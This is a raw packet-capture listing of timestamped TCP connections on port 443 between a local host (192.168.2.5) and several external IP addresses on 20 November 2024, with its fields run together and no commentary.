                                                                                                                                                                                              Nov 20, 2024 21:28:27.655770063 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.659590006 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.659672976 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.659975052 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.660026073 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.663718939 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.663779020 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.663957119 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.664019108 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.665846109 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.665910006 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.666209936 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.666268110 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.667470932 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.669821024 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.669838905 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.669913054 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.669918060 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.671441078 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.671449900 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.671454906 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.671495914 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.671545982 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.671566963 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.671710968 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.671901941 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.671961069 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.673703909 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.673796892 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.675287008 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.675362110 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.676090956 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.676143885 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.677542925 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.677619934 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.679568052 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.679757118 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.679810047 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.683955908 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.684010983 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.685614109 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.685683012 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.685916901 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.685976028 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.687355995 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.687503099 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.687517881 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.690481901 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.690543890 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.693031073 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.693106890 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.695396900 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.695482016 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.695496082 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.696439981 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.696521044 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.696978092 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.697036982 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.698278904 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.698368073 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.699028015 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.699084044 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.699153900 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.699209929 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.703242064 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.703303099 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.703624964 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.703875065 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.703890085 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.707103014 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.707182884 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.709254980 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.709316969 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.711607933 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.711808920 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.711821079 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.719660044 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.719737053 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.719748974 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.729407072 CET49845443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.729429007 CET4434984545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.729528904 CET49845443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.730102062 CET49845443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.730115891 CET4434984545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.730551958 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.730634928 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.732036114 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.732098103 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.734755039 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.734814882 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.735513926 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.735579014 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.735591888 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.743223906 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.743304968 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.743333101 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.750897884 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.750969887 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.751024961 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.751033068 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.751813889 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.760457039 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.766573906 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.766791105 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.766797066 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.766973972 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.767051935 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.767107964 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.768167973 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.768239021 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.768290043 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.772088051 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.772155046 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.772209883 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.776702881 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.776846886 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.776911020 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.779578924 CET49818443192.168.2.5108.158.75.29
                                                                                                                                                                                              Nov 20, 2024 21:28:27.779704094 CET44349818108.158.75.29192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.779803991 CET49818443192.168.2.5108.158.75.29
                                                                                                                                                                                              Nov 20, 2024 21:28:27.781205893 CET49846443192.168.2.5104.17.25.14
                                                                                                                                                                                              Nov 20, 2024 21:28:27.781236887 CET44349846104.17.25.14192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.781296015 CET49846443192.168.2.5104.17.25.14
                                                                                                                                                                                              Nov 20, 2024 21:28:27.781569958 CET49846443192.168.2.5104.17.25.14
                                                                                                                                                                                              Nov 20, 2024 21:28:27.781584024 CET44349846104.17.25.14192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.791207075 CET49848443192.168.2.5172.217.21.36
                                                                                                                                                                                              Nov 20, 2024 21:28:27.791233063 CET44349848172.217.21.36192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.791291952 CET49848443192.168.2.5172.217.21.36
                                                                                                                                                                                              Nov 20, 2024 21:28:27.791568041 CET49848443192.168.2.5172.217.21.36
                                                                                                                                                                                              Nov 20, 2024 21:28:27.791578054 CET44349848172.217.21.36192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.819228888 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.828214884 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.828227997 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.828260899 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.828320026 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.828336954 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.828372955 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.832453966 CET4434982513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.834605932 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.834626913 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.834707975 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.834718943 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.835172892 CET4434982413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.835644960 CET4434982313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.845290899 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.845308065 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.845390081 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.845403910 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.854820967 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.854835033 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.857785940 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.857827902 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.857836962 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.857932091 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.858055115 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.858119965 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.858166933 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.858208895 CET4434982613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.858232021 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.858247042 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.858385086 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.858447075 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.858462095 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.860558987 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.861421108 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.861443043 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.861505985 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.861515999 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.861531973 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.863004923 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.863028049 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.863061905 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.863070011 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.863281965 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.867872000 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.868643999 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.868691921 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.868717909 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.868729115 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.868758917 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.870253086 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.871109009 CET49826443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:27.871124029 CET4434982613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.871854067 CET49826443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:27.871860981 CET4434982613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.872315884 CET49825443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:27.872344017 CET4434982513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.873006105 CET49825443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:27.873013973 CET4434982513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.873260021 CET49824443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:27.873276949 CET4434982413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.873861074 CET49824443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:27.873867035 CET4434982413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874011040 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874104023 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874150991 CET49823443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874175072 CET4434982313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874243021 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874263048 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874492884 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874711037 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874756098 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874773979 CET49823443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874780893 CET4434982313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874803066 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874811888 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.874840021 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.877655029 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.877748013 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.877763033 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.877950907 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.881633997 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.881688118 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.881700039 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.881711960 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.881803036 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.882425070 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.882431984 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.882539034 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.887535095 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.887595892 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.896200895 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.896209002 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.896260977 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.900722027 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.900804043 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.900816917 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.900873899 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.901395082 CET44349834136.143.190.100192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.901624918 CET49834443192.168.2.5136.143.190.100
                                                                                                                                                                                              Nov 20, 2024 21:28:27.901653051 CET44349834136.143.190.100192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.903559923 CET44349834136.143.190.100192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.903625965 CET49834443192.168.2.5136.143.190.100
                                                                                                                                                                                              Nov 20, 2024 21:28:27.903954029 CET49834443192.168.2.5136.143.190.100
                                                                                                                                                                                              Nov 20, 2024 21:28:27.904097080 CET49834443192.168.2.5136.143.190.100
                                                                                                                                                                                              Nov 20, 2024 21:28:27.904119968 CET44349834136.143.190.100192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.909290075 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.909368992 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.917821884 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.917886972 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.925944090 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.926016092 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.930166960 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.930247068 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.938663006 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.938786030 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.943468094 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.943533897 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.945477962 CET49834443192.168.2.5136.143.190.100
                                                                                                                                                                                              Nov 20, 2024 21:28:27.945483923 CET44349834136.143.190.100192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.952140093 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.952239037 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.960589886 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.960773945 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.977174997 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.982386112 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.982469082 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.989581108 CET49834443192.168.2.5136.143.190.100
                                                                                                                                                                                              Nov 20, 2024 21:28:28.023354053 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:28.023372889 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.036765099 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.036837101 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.036859035 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:28.036880016 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.036906958 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:28.036931992 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:28.036940098 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.042582035 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.042624950 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.042665005 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:28.042685032 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.042701006 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:28.042726994 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:28.042736053 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.042875051 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.042927027 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:28.043034077 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:28.043049097 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.048284054 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.048464060 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.048500061 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:28.048546076 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:28.050223112 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:28.050255060 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.051299095 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.051387072 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:28.053194046 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:28.053267002 CET49821443192.168.2.5104.22.1.204
